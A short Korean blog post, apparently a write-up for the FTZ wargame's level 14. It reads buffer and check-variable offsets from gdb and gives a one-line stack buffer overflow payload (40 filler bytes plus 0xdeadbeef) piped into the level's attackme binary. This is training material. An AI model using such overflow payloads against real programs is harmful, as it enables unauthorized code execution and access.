level 13은 이전과 풀이가 동일하기 때문에 생략했다.
hint
gdb로 까보면
fgets 주변에 [ebp-56]이 buf의 시작 주소이고,
cmp 주변에 [ebp-16]이 check의 주소임을 알 수 있다.
따라서 40바이트는 아무 값이나 채우고, 마지막 4바이트(==check)에 0xdeadbeef를 넣으면 된다.
따라서 (python -c 'print "A"*40+"\xef\xbe\xad\xde"'; cat) | ../attackme
my-pass 찍으면 답 나온다.
'워게임 > FTZ' 카테고리의 다른 글
| FTZ - level16 (0) | 2021.07.26 |
|---|---|
| FTZ - level15 (0) | 2021.07.24 |
| FTZ - level12 (0) | 2021.07.22 |
| FTZ - level11 (0) | 2021.07.21 |
| FTZ - level10 (1) | 2021.07.12 |
댓글